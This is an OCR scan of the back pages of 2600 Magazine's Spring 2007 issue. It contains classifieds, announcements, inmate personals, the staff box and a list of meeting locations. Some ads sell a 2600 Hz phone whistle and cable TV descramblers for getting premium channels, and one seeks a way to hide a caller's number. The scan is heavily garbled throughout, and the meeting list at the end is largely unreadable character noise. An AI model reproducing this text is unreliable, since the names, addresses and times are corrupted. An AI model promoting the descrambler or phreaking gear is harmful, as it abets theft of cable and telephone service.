one hole and get exactly 2600 hz, cover the other hole and get another
frequency. Use both holes to cal l your dog or dol pl li n. Also, ideal for
telephone remote control devices. Price includes mai l i ng. $49.95. Not
onl y a collector' s item but a VERY USEFUL device to carry at al l ti mes.
Cash or money order only. Mai l to: WHI STLE, PO. Box 1 1 562-ST, Cit,
Mi SSOUri 631 05.
PHRAINE. The technology without the noi se quarterly woul d l i ke to
thank the 200 readers who have also become new subscribers anc
encourages those who have not ACK thei r need for diverse computer
information i n conjunction with that of 200to dedicate some packets
and become a subscriber today! Visit us at our new domain www.
pearlyfreepress.com/phraine.
J! NX-HACKER CLOTHING/GEAR. Tired of bei ng naked? JI NX. com
has 300+ T' s, sweatshi rs, sti ckers, and hats IO|those rare ti mes that
you need to l eave your house. We've got swag for everyone, from the
buddi ng nOOblet to the vintage geek. So take a five mi nute break from
surfi ng prOn and check out http://www. JI NX. com. Uber-Secret-Special
Mega Promo: Use "2600v3n02" and get 1 0% off of your order.
CABLE TV DESCRAMBLERS. New. Each $45 $5.00 shi ppi ng, money
order/cash only. Works on analog or analog/digital cable systems.
Premi um channel s and possibly PPV depending on system. Complete
with 1 1 0vac power supply. Purchaser assumes sole responsibility for
notifying cable operator of use of descrambler Requi res a cable TV
converter ( i . e. , Radio Shack) to be used wi th the unit. Cable connects
to the converter, then the descrambler, then the output goes to T
set tuned to channel 3. CD 9621 Ol i ve, Box 28992-T8, Olivettet Sur,
Mi ssouri 63132. Emai l cabledescramblerguy@yahoo.com.
Page 62 2600 Magazine
Wanted
OPT DIVE H for 800 numbers desperately needed for privacy. I need
a telephone number anywhere i n the U.S. that will then gi ve a dial tone
from whi ch one can di al a toll-fre 800 number so that the toll-free
number busi ness recipient does not have the actual telephone number
from whi ch the call originates. AT&T used to work for thi s purpose but
no longer does. Please emai l opCdivert@yahoo.com.
HELP! I want to set up a voice bri dge chat l i ne for hackers but
need the software. Cal l me at (21 3) 595-8360 (Ben) or www.
Undergrou ndClassifieds.com.
Serices
HACKER TOOLS TREASURE BOXI You get over 630 l i nks to
key resources, pl us our proven methods for rooting out the hard
to-find tools, instantly! Use these l i nks and methods to build your
own customized hacker (AHEM, network security) tool kit. http://
wealthfunnel.com!securitybook
AOVANCED TECHNICAL SOLUTIONS. #422 - 1 755 Robson Street.
Vancouver, B. C. Canada V6G 3B7. Ph: (604) 928-0555. Electronic
countermeasures - fi nd out who i s secretly videotaping you or buggi ng
your car or ofi ce. State Othe A detection equi pment uti l i zed.
FREERETI REDSTUFF.COM * Donate or request free outdated tech
products - i n exchange for some good karma - by keepi ng usabl e
unwanted tech i tems out of your nei ghborhood landfi l l . The FREE and
easy text and photo cl assi fi ed ad websi te is desi gned to fi nd l ocal
people i n your a wi l l i ng to pi ck up your unwanted tech products
or anything else you have to donate. Thank you for hel pi ng us spread
the word about your new gl obal recycl i ng resource by distributing thi s
ad to free classified adverti si ng si tes and newsgroups globally. Www.
FreeRetiredStuff .com FREE ADS are available for those trying to BUY or
SELL tech products. Visit www.NoPayClassifieds.com.
SUSPECTED OR ACCUSED OF A CYBERCRIME I N ANY
CALIFORNIA OR FEDERAL COURT? Consult with a semantic
warrior committed to the liberation of information. I am an aggressive
criminal defense lawyer specializing i n the following types of cases:
unauthorized access, theft of trade secrets, identity theft, and trademark
and copyright infringement. Contact Omar Figueroa, Esq. at (41 5) 986-
5591 . at omar@stanfordal umni . org, or at 506 Broadway. San Francisco,
CA 941 33-4507. Graduate of Yale College and Stanford Law School.
Compl i mentary case consultation for 200 readers. Al l consultations
are strictly confidential and protected by the attorney-client pri vi l ege.
INTELLIGENT HACKERS UNIX SHELL. Reverse.Net is owned and
operated by intelligent hackers. We believe every user has the right to
onl i ne security and privacy. I n today's hostile anti-hacker atmosphere,
i ntel l i gent hackers require the need for a secure place to work, compi l e,
and explore wi thout big-brother l ooki ng over thei r shoul der. Hosted at
Chicago Equi ni x with Juniper Fi l tered DoS Protecti on. Multi pl e FreeBSD
servers at P4 2. 4 ghz. Afordable pri ci ng from $5/month with a money
back guarantee. Lifetime 26% discount for 200readers. Coupon code:
Save2600. http://www.reverse.net
ANTI-CENSORSHIP LINUX HOSTING. Kaleton Internet provides
afordable web hosting, email accounts, and domain registrations based
on dual processor P4 2.4 GHz Linux servers. Our hosting plans start
from only $8.95 per month. This i ncl udes support for Python, Perl, PHp
MySQL, and more. You can now choose between the USA, Singapore,
and other offshore locations to avoid censorship and guarantee free
speech. We respect your privacy. Payment can be by E-Gold, PayPal,
credit card. bank transfer, or Western Uni on. See www.kaleton.com for
details.
ARE YOU TIRED of receiving pi l es of credit card offers and other
postal spam? You can' t just throw them i n the trash or recycle them as
someone Goul d get a hold of them and use them to steal your identity.
You can' t just let them pile up on your kitchen table. So instead you
have to be bothered wi th shredding and disposing of them. Well, not
anymore. Operati onMai l Back.com has a free solution for you. Al l costs
of disposal i ncl udi ng delivery will be pai d by the company responsible
for sending the stuf to you. Stop wasting your valuable ti me dealing
with messes other people are responsible for creating. Check out our
newly redesigned website for complete information and take back your
mai l box.
BEEN ARRESTED FOR A COMPUTER OR TECHNOLOGY RELTED
CRI ME? Have an i dea, i nventi on, or business you want to buy, sel l ,
protect, or market? Wish your attorney actual l y understood you when
you speak? The Law Office of Mi chael B. Green, Esq. is the soluti on
to your 21 st century legal problems. Former SysOp and member of
many private BBS' s since 1 981 now available to directly represent
you or bridge the communi cations gap and assist your current legal
counsel. Extremely detailed knowledge regarding cri mi nal and ci vi l
l i abi l ity for computer and technol ogy related acti ons (18 U.S. C. 1 028,
1 029, 1 030. 1 031 , 1 341 . 1 342, 1 343, 251 1 . 251 2, ECPA, DMCA, 1 996
Telecom Act, etc.), domain name disputes, intellectual property matters
such as copyrights, trademarks, licenses, and acquisitions as well as
general busi ness and corporate law. Over eleven years experience
as i n-house legal counsel to a computer consulting business as well
as an over 20 year background i n computer, telecommunications,
and technology matters. Publ i shed law review articles, contributed to
nati onally publ i shed books, and submitted briefs to the Uni ted States
Supreme Court on Internet and technology related issues. Admitted to
the U. S. Supreme Cour, 2nd Ci rcuit Court of Appeals, and al l New York
State courts and familiar with other j urisdictions as wel l . Many attorneys
wi l l take your case without any consideration of our culture and wi l l see
you merely as a source of fees or worse, with ill-conceived prejudices.
My office understands our culture, is sympathetic to your situation, and
will treat you with the respect and understanding you deserve. No fee
for the i niti al and confidential consultation and, if for any reason we
cannot hel p you, we will even to fi nd someone el se who can at no
charge. So you have nothi ng to lose and perhaps everythi ng to gai n
by contacting us fi rst. Vi si t us at: http://www.computorney.com or call
51 6-9WE-HELP (51 6-993-4357).
Announcements
OFF IEHOOK i s the weekly one hour hacker radio show presented
Wednesday nights at 7:00 pm ET on WBAI 99.5 FM I n New York City.
You can also tune i n over the net at www.2600.com/ofthehook or on
shorwave i n North and South Ameri ca at 741 5 khz. Archi ves of al l
shows dating back to 1 988 can be found at the 200site. now i n mp3
format! Shows from 1 988-2005 are now available i n DVO-R format
for $30! Or subscribe to the new high quality audio serice for onl y
$50. Each month you' l l get a newly released year of h !Hook i n
broadcast qual i ty (far better than previous onl i ne releases). Send check
or money order to 200, PO Box 752, Middle Isl and, NY 1 1 953 USA or
order through our onl i ne store at http://store.2600.com. Your feedback
on the program is always welcome at oth@2600.com.
INFOSEC NEWS i s a privately run, medi um traffic l i st that caters to the
distribution of information security news articles. These articles come
from such sources as newspapers, magazines, and online resources.
For more information, check out: http://www. infosecnews.org.
PHONE PHUN. http://phonephun. us. Blog devoted to interesting
phone numbers. Share your fi nds!
CHRISTIAN HACKERS' ASSOCIATION: Check out the web page
http://www. christianhacker.org for details. W exi st to promote a
community for Christian hackers to discuss and impact the realm where
faith and technology intersect for the purpose of seeing lives changed
by God's grace through faith i n Jesus.
Personal s
PLEASE WRITE ME. WM bl ue eyes brown hair, 6' 3", 1 95 I bs. . 28
years ol d (send a pi c, I wi l l do t he same). I ' m incarcerated f or drug
manufacturing. Been down 1 year, got 1 or 3 more to go. I 'm l ooki ng
for anyone to tal k to about real worl d hacki ng, I Ds, or any 200 related
stuff. I love to write and have nothi ng but time. Meclynn Stuver GN-
1 1 4 1 , P. O. Box 1 000, Houtzdale, PA 1 6698-1 000.
PRISONER SEEKS FRIENDS to hel p with book revi ew lookups on
Amazon by keywords. Com Sci major, thi rsty to catch up to the real
world before my reentry. I have my own funds to buy books. I only need
reviews. I ' m MUD/MMORPG savy i n C++lPython/PHP/MySOL. I ' ve
moved. Please resend. Ken Roberts J60962. 450- 1 -28M, PO Box 9,
Avenal, CA 93204.
SEEKING NON-STAGNANT MI NDS for mutual i l l umi nation/exchange
of thoughts and ideas. Three years left on my sentence and even
with al l my coaching the walls sti l l can't carry a decent conversation.
Interests include cryptography, security, conspiracy theories, marial
arts. and anything computer related. Al l letters replied to. Max Rider,
SBI #00383681 D. C. C. , 1 1 81 Paddock Rd., Smyrna, DE 1 9977.
I N SEARCH OF FRIENDs/CONTACTS: Rai l roaded by l yi ng evidence
burying FBI agents and U.S. Postal Inspectors for cri me | di dn' t
commi t. I n court I had a snowball's chance i n hel l . Unless I outsmart
the government by exhumi ng the eXCUlpatory treasure trove of my
innocence, I ' m hopel essl y dungeoned for the duration. There's only a
little gleam of time between two eternities. I refuse to return to forever
without a fight. Wi l l answer all. W. Wentworth Foster #21 1 8 1 . Southeast
Correction Center, 300 East Pedro Simmons Drive, Charleston, MO
63834.
OFFLI NE OUTLAW I N TEXAS i s looking for any books Uni x/Li nux I can
get my hands on. Also very interested i n privacy i n al l areas. If you can
point me i n the right direction or feel l i ke teaching an ol d dog some new
tricks. drop me a line. I ' l l answer al l letters. Props to those who already
have, you know who you are. Wi l l i am Lindley 822934, 1 300 FM 655,
Rosharon, 1 77583-8604.
I N SEARCH OF NEW CONTACTS every day. I have a lot of ti me to pass
and am always up for a good discussion. Joi nt source audi t anyone?
Of course i t' l l have to be on paper. Interests not l i mited to: low-level
OS codi ng, embedded systems, crypto. radiotelecom. and conspiracy
theory. Will reply to all. Brian Salcedo #321 30-039, FCI McKean, PO.
Box 8000. Bradford, PA 1 6701 .
ONLY SUBSCRIBERS CAN ADVERTISE IN 2 l Don' t even thi nk
about trying to take out an ad unl ess you subscribe! Al l ads are free and
there i s no amount of money we wi l l accept for a non-subscriber ad.
We hope that' s clear. Of course, we reserve the right to pass judgment
on your ad and not print it if i t' s amazi ngly stupid or has nothi ng at al l
to do with the hacker world. We make no guarantee as to the honesty,
righteousness, sanity, etc. of the people advertising here. Contact
them at your peri l . Al l submissi ons are for ONE ISSUE ONLY! lI you
want to run your ad more than once you must resubmit it each ti me.
Don' t expect us to run more than one ad for you i n a si ngl e i ssue either.
I ncl ude your address label/envelope or a photocopy so we know you' re
a subscriber. Send your ad to 200 Marketplace, PO Box 99, Mi ddl e
I sl and, NY 1 1 953. Deadline for Summer i ssue: 6/1/07.
Spring 2007Page 63
Answer choice for Winter 2006 puzzle:
" The ea s t c ode s-we s t c o d e s NPA r i va l ry t a k e s
i t s t o l l . " LVM!l
[lll||"".|10
Pge 64 2600 Magazine
!O/OOuC//OO O//OO O3Oyu5/u/ /O/Og8 /5u//5
/O /OO O3Oyu5/55 O/. 3// 3O
STAff
Edi tor- I n-Chi ef
Emmanuel Gol dstei n
Layout and Desi gn
ShapeShi fter
Cover
Dabu Ch ' wal d
Ofi ce Manager
Tampruf
Wri ters: Berni e S, ' Bi l l sf, Bl and
I nqui si tor. Eri c Corl ey, Dragorn ,
John Drake, Paul Estev. Mr, French,
Javaman, Joe630, Ki ngpi n , Lucky22S.
Kevi n Mi t ni ck, The Prophet , Redbi rd,
Davi d Ruderman, Screamer Chaoti x.
Sephai l , Seraf. Si l ent Swi tchman.
StankDawg. Mr, Upsetter
Webmasters: Jui ntz. Kerry
Network Operati ons: css
Qual i ty Degradati on: ml c
Z SSN 0749-3851, USPS P003- 1 76),
Sprng 2007, Volume 24 Issue , is
published quarery by 2600 Enterrises
Inc., 2 Flowerield, St. James, N7
1 780. Perodical postage rtes
paid at St. James, N7and additional
maiing ofices. Subscrption rtes
in the U. S. $20 for one year
POSTMASTER: Send address
changes to 2600, PO. Box 752,
Mi ddl e I sl and, NY 1 1 953-0752.
Copyri ght (c) 2007 2600 Enterprises I nc.
YEARLY SUBSCRI PTION:
U. S. and Canada - $20 i ndivi dual ,
$50 corporate (U. S. Funds)
Overseas - $30 i ndi vi dual , $65 corporate
Back i ssues avai l abl e for 1 984-2006 at
Broadcast Coordi nators: Jui ntz, t hai
I RC Admi ns: koz. sj , beave,
carton . rOd3nt , shardy
Forum Admi n: Skram
I nspi rati onal Musi c: Queen , Anti
Nowhere League. James Brown.
Euryt hmi cs, Buffal o Spr i ngfi el d,
Gl enn Mi l l er. Asobi Seksu
Shout Outs: mrq, John
Harl acher. Eyebeam
$20 per year, $26 per year overseas
I ndi vi dual issues avai l abl e from 1 988 on
at $5. 00 each, $6. 50 each overseas
ADDRESS ALL SUBSCRI PTION
CORRESPONDENCE TO:
2600 Subscription Dept. , PO. Box 752,
Mi ddl e I sl and, NY 1 1 953-0752 USA
(subs@2600. com)
FOR LETERS AND ARTICLE
SUBMISSIONS, WRITE TO:
2600 Editorial Dept. , PO. Box 99,
Mi ddl e I sl and, NY 1 1 953-0099 USA
(letters@2600. com, arti cl es@2600. com)
Z Ofice Line: +T T 1T Z
Z Fax Line: +T T 414 Z11
Sprng 2007ge 65
PbNN
PfBS. |OlhO
bbb
P1D00S! LulS|OOlhO OOO8slO|O|
Swl|||Ou OOlmCOmO|Ol |l|
OO lOum$ 7 PU
MBDOUf0B. L|OO
1 6 wOSlO|k, OOO|OOu|

PN

LOOl|| h LOOl|O. .30 m , )UD.AllhO O 0OlhSOO

!OOO COu|l. 6 m. NYOfK


B0BSB. | OlhOOCkO!lhO NYOfK.L|l|Q|OuLOOlO|, |OlhO
UO|vO! ||O||OO|lZ UO|OO |OOOy,OO|lhOyhOOOS, 1 53 L

|O
.
`
0|lOOlwOOOvO

|O!|OOlO!

NOChu WOK. m.
G0B. L|ySl| ||CO, !|OOl
W|CklwL
S|OO1we|
O|lO|Sl|O, OOS|lO lhO OuS Sll|OO
7m.



B0QB. UO|WS|ly

CkO!

1> g
fO 0B lhO !OOOCOlh!|OO|. pm.

|OOO GOO|QO l. l LOOl|| l


l|OO. 6 m.
PUlP
fBZ. L!O H|lOSlO||OOOJkOm|O|
|lZ.
PZlL
BO HOfZO01B. |O|OQO'S U|lA
Su!OOQ, OO|lhOyhOOO. 6 m.
PNPP
PD0f1B
B@Bf. Lu L|||O M|kOl!OOO
COu|lOylhO O|OO yO||Ow w||. 6 m.
f1SDOU0DB
VB0COUVBf. LuOL!!O &U|, 1 01 4
WOSl OO|Q|l.
VC1OfB. LVUkOqOO L!O, 1 701
OvO|OmOOll.
MB01ODB
W00QB@. l. V|l| hO|OQ LOOl|O,
!OOOCOu|lOy HMV.
N fU0SWCK
MO0C1O0. |OuOOZO|ONOlwO|kS
|OlO|OOlL!O, 7Z0 M|Ol. 7 m.
L01BfO
BffB. W||||m'SLOl!OO|uO, 505
U|yOO ||vO. 7 m.
U0QD.W||||m'SLO!!OO |uO, 492
LO|OOOu|Qh HOO Oulh. 7 m.
LUBWB. WO||O LChOQO ||Z, 1 1 1
A|OO|ll. , SOCOOO!|OO|. 6:30 m.
OfO01O. LO||OQO ||k|OOOLOu|l,
C|OSS!|Om lhOCO UO||.
WB1BHOO. W||||m'S LO!!OO |uO, 1 70
UO|vO|S|lyAvO. WOSl. 7 m.
W0GSOf. UO|vO|S|lyO!W|OOSO|,
LAW luOOOl LOOlO| COmmOOS |O
OylhO ||QO w|OOOw. 7m.
>
MO01fB. HO||Amh|lhOl|O, 1 000,
|uOOO |GuChOl|O|O.
HlNP
HO0@hO0@. |C|!|CLOl!OO |O |OSl|
v| W|k, KOw|OOO OOQ. 7m.
ZbHbHUL
Hf8gU0.LOQOOOpuO. 6 m.
bNMPh
PBDOf@. |SlLOO|O' SOO| h||.
P8fDUS. | OlhO!|COmO|O!lhO H
C!O |OlhO |||wySll|OO.
OQ00DB@B0. L!O H|SOO.
O0GBfDOf@. L!O U|uOO. 7:30 m.
bYH
HOO BG.AllhO!OO|O!lhOLOO||Sk
(L| M|SS||h).
bNLN
f@D1O0.AllhO hOOOOOxOSOylhO
O1!OLOOl|O(C|OSSlhO|OO!|Om
lhO ||CO || O|). 7 m. |yphOOO.
(01 273) 606674.
bX01Bf.AllhO yphOOOS, HOO!O|O
qu|O. 7 m.
LO0GO0.|OCOO|OhOp| OQLOOlO|
(OO| ||CCO|||y L||CuS), |OwOSl |OvO|.
6:30 pm.
M80CD0S10f. Hu||S HOO |uOOO
LOOOOO HO. 7:30 pU.
NOfWCD. HO|OO|SOOl|OCOlO
LhO|!|O|O M| | . 6 m.
0BG0@!A!|O H|, MO|ChOlS ||CO,
Ol!||||Sl. 6 pm.
lNLN
H0S0K. |OOO|kO||IO||!OOOCOu|!
(VuO||klu 1 4) .
Nb
fB0OD0. LvO, CmpuSO!l. Md||O
O` HO|OS. 6 m.
HBfS! ||COOO | HOuO||quO, OO|
lhO (Omply) !OuOl|O. 6:30 pm.
0000S. |O!|OOl O!lhOSlO|O"H|uO
HOx"C|OSOlO ||COOO | HOpuO||quO.
8
r
PLY
MB0. ||ZZ LO|OlO |O!|OOlO!
MCOO|OS.
dPHPN
OKO. L|OuL!O| OAk|hqO|
O|Sl||Cl. 6 m.
NbWZbPLPNQ
PUCKB0G. LOOOOO U|, uSl||S,
WO||OS|Oy l., AuCk|OOLqOl||.
5:30 m.
DfS1CDUfCD. Jv L!O,COmO|O!
H|Qh l. OO MOChOSlO|l. 6 m.
WB0@1O0.LOOL!O|OLuO
M||. 6 m.
NLWPY
LSO. LS|O OOl|| ||O ll|OO.
7 m.
fO0SOB.hO uO|!|OO|l U|
HOCkL!O, l|OOQl 1 4, 6 m.
fO0GDB0. H|Ck'SL!O |ONO|O|O
QlO. 6 m.
HbU
L0B. U|O||OO|[OAud|), OO
A|CO!O|OS455, M||!|O|OS, l lhOOOO
O!|l !. m.
LLPN
BS@OW. LOOl||ll|OO,
y
hOOOSOOllO ||llO|m 1 . 7m.
LUHPlP
dODB00BSDUf@{B0G1O0Q].
OOlOO!OOOCOuU. 6:30 m.
WbbN
O1DB0DUf@. ZOO!|OO||O Q
u|QO|
K|OQ l AvOOyO. 6 m.
1OCKDO0. LulS|OO Lv.
WlZbLPN
LBUSB00B! |O!|OOlO! lhO McO
OOS|OOlhOl||OSll|OO.
UNlb PbQ
PBDB0B
PUDUf0. hOSluOOOl|OuOgOuSl||S
|OlhO |OyUO|OO Uu||O|OQ. 7m.
HU01SVB. lO||OO'SuOV|||OO
JO|OO LOO.
SCBOOSB.MC|||OO MB||!OOO
COu|l OO| lhO!|OOl OOl|OCO.
PfZO0B
UCSO0. UO|OO|S|OlhO |d M||.
7 pm.
BOf0B
lfV0B. |OO| H|OO, 3988 H||OC
||kwy.
LOS P0@BBS. UO|OO ll|On,
COmO| O! MCy&A|mOO. |OS|OO
m|OOOl|OCOOy OOkO!hOOOS.
|yhOOOS. (21 3) 972-951 Q, 9520;
625-9923, 9924; 61 3-9704, 9746.
BCfB0B01O. HOuOOO|O||ZZl
1 27 K l.
B0B@O.HOQOOlS||ZZ,41 50
HOQOOlS ||k HOw#1 70.
B0 fB0CSCO. 4 LmO|CdOO|O
||Z(|OS|OO). |yphOOes. (41 5)
398-9803, 9804, 9805, 9806.
5:30 m.
B0JOSB.LulS|OOlhOC!O llhO
MLKL|O||yl4lhOO L. >O
|O|OOOO. 6 m.
OOfBGO
OUU0f. W|OQZOOO!OOO COu||, 1 3th
OO LO||OQO. 6 m.
00VBf. HO|OO|SL!O, ||kO|OO
A|phOO.
S1fC1 O OU0DB
f0g1O0. |OOlQOO L|ly M|| |OlhO
!OOOCOu|!(OO|Au HOO || O) 8 pm
OfUB
1. LBuUBfU80. H|Ow|OMH |O!hO
ROUB. Oulh ||kM||k
f@B O|l 7 m
P1B01B.LOOOM||!OOOCOu|l.7,

_ _
GBDO
OSB. UUluOOOl UO|OO Uu||O|OQ,
uSl||S!|OmlhOm|OOOl|OCO.
|yhOOOS. [Z0)34Z-9700, 9701 .
HOCB1BlO! LO||OQO M|kOl, 604
Oulh lh l.
l 0OS
DCB@O.NO|QhOO|hOOOUOySOO
|||S L|uO, 2501 W ||v|OQ ||k
HO. 7 m.
l0GB0B
LVB0SVB.U|OOSOO NOO|OC!O
l 624 G|OOO H|vO|HO.
F.WB0B. G|OOO|OOkM| | !OOO COu|l
|O!|OOlO! O||O'S. 6 m.
l0GB0BQOS. LO|OO|LOBOO, W
COmO|O! 1 1 lh OOA|Om.
OU1DB0G{MSDBWBK8]. UmOS
OO NOO|OC!O,4601 |O HO.
OWg
P00S. MOmO||| UO|OO Uu||O|OQ!OOO
COu|l l lhO |Ow llO UO|vO|S|ly.
hB0SBS
hB0SBS 1{LVBfB0G HBfK]. Lk
||k M|| k COu|l.
WCD1B. H|vO|S|OO |O|k, 1 1 44
H|!!|OQAvO.
LOUSB0B
B1O0 OU@B. | OlhO LU UOk
Uu||O|OQ, OOlwOOOlhO|QO||uSO&
MCOO|O'S. 6 m.
NLfBB0S. Z'OlZ LOl!OO HOuSO
ulOwOlZ1 0Lkl|OOl.6 m.
MB0B
HOf1B0G. M|OO M||OylhOOOOChl
lhO!OOOCOu|lOOO|.
MBfB0G
B10OfB. U|OOS& NOO|O C!O l
lhO |OOO|H|OO|.
MBSSBCDUSB11S
OS1O0. ||uOOOl|| LOOlO| ||Z,
lO||COk COu|ll lhOlO|OSOO|
lhO w|OOOwS. 6 m.
MBfDOfOU@D. O|OmOO ||k M||
!OOOCOu|l.
NOf1DB0Q1O0. OwOSl||SO! Hy
m|kOlL!O. 6:30 m.
MCD@B0
00fDOf.l|OuCkS|O1hOG||O||
OO Oulh UO|vO|S|ly.
M 00BSO1B
OO00@1O0. M|| O!AmO||C, OO|!h
S|OO!OOO COu|l, C|OSS!|Om Hu|QO|
K|OQ &lhO OOkO! pyhOOOSlhl
OOO'llkO |OCOm|OQ C||S.
MSSOUf
hB0SBS 1 {l0GBQB0GB0CB].
H|OOS& NOO|O, 1 91 20 LSl 39lh !.
1. LOUS. ||O|| |OOO LOu|I.
Qf0@BG. HO|OO|SHOOkSOO
MuS|C CO!lOOShO, 3300 Oulh
G|OOSlOOOAvO., OOOO|OCkSOulhO!
H!!|O!|O|O M| | . 5:30 m.
NBDfBSKB
L0BDB. L|OSS|OOS M|| |OOO
LOu|I. 7 m.
NBVBU8
L8S V0gBS. LOI!OO HOOOLO!
CO!IOO ShO, 4550 . M|y|OO
|kwy.7 pm.
NBWMBXCO
DUQUBfQU0. UO|vO|S|lyO! NOw
MOx|COluOOO| UO|OO Hu||O|OQ (p|z
"|OwO|" |OvO| |OuOQO), ma|O CamuS.
|yhOOOS. 505-8439033, 505843-
9034. 5:30 pm.
C|SO|lS U|OOC|OSS!|Om
MO|OO|lhLO||OQO).
NOOD BKO1B
Bf@O. WOSlAC|OS M|| !OOO COu|! Oy
lhOCO JOhO'S.
LDO
0C00B1.hOU|OwHOuSO, 1 047
LSl MCM|||O. 7 m.
BVBB0G. UO|vO|S|lyL||C|OA|O|C,
1 1 300 JuO|O| HO. USl||S, lum
||Qhl, SOCOOO |OOm OOk.
OU0DUS. LOOvOOl|OOCOOlO|OO
Sl|OOl|OvO| |OuOOlhO COmO|!|Om
lhO!OOOCOu|l.
BIO0. ||||Oy'SOl!7Z5OylhO
ylOO M||.
LKBDO0B
LKBDO0B 1. L!O UO||, SOulh
OSlCOmO|O!W9lh l.OO |OOO.
SB. ||OmOOOO M||!OOOCOu|l.
LfB@O0
HOOB0G. UCkSCOL!O, 1 1 5 NW
5lhAvO.6 m.
H000SVB0B
PB01OW0. |OO|U|OO, 31 00
WOSl ||QhmO l. 6 m.
HDBGBQDB. 30lhl. ll|OO, SOulh
OSl!OOOCOu|lOO|m|O|OSlOll|CO.
OU1D BfO0B
DBfBS1O0. NO|lhwOOOS M|||OlhO
h||OOlwOOOO|SOOLh|k-|||-A.
OU1D BKO1B
OUX BS. Lm||O M||, Oy Uu|QO|
K|OQ.
B00
h0OXVB. UO|OO|S UOOkSL!O
C|OSS!|Om WOSlOwO M||.
MB0QDS.Al|OlU|OOLO. , 4770
|O||AvO. 6 m.
NBSDV0. J-J'S M|kOl, 1 91 2
U|OOwy. 6 m.
BXBS
PUS10. p|OO|HOuSOL!O, 2908
||ulh l. 7 pm.
HOUS1O0. N|O!'S Lx|OSS|O!|OOlO!
NO|OSI|Om'S|OlhO||O|| M||.
B0P01O0O.NO|lhl|M||!OOO
COu|l. 6 m.
U1BD
B1 LBKB 1. ZLM| M|||OhO
||k |OOO LOu|l.
f0O01
Uf0@1O0. HO|OO|S HOOkSl
Lhu|Ch l. OOLhO||y l. OO lhO
SOCOOO !|OO| O!lhO C!O.
Vf@0B
Pf0@1O0. (SOO|Sl||ClO! LO|umO|)
Vf@0B BBCD. LyOOhvOOM||OO
LyOOhvOO ||kwy. 6 pm.
WBSD0@1O0
BB11B.WSh|OQlOOllOLOOvOO
l|OO LOOlO| ZOO |OvO|, SOulh S|OO.
6 m.
WSCO0S0
MBUSO0! UO|OOOulh (227 N.
HOO||AvO.) OOlhO|OwO||OvO||O
lhO M|I|O LulhO|K|OQJ|. LOuOQO.
|yphOOO. (608) 251 -9909.
P 0BB10@S1BKBQ8C0O01D0
fS1 fUB O 1DB 0O01D. U0BSS
O1D0fWS00O1BG,1D0S1BOa5 Q0
OC8 10B.OS1Bf1B 0m10g 0
gOUfC1, S00U 0081O
0BB10gS%Zb.CO0.
Pge 66
2600 Magazine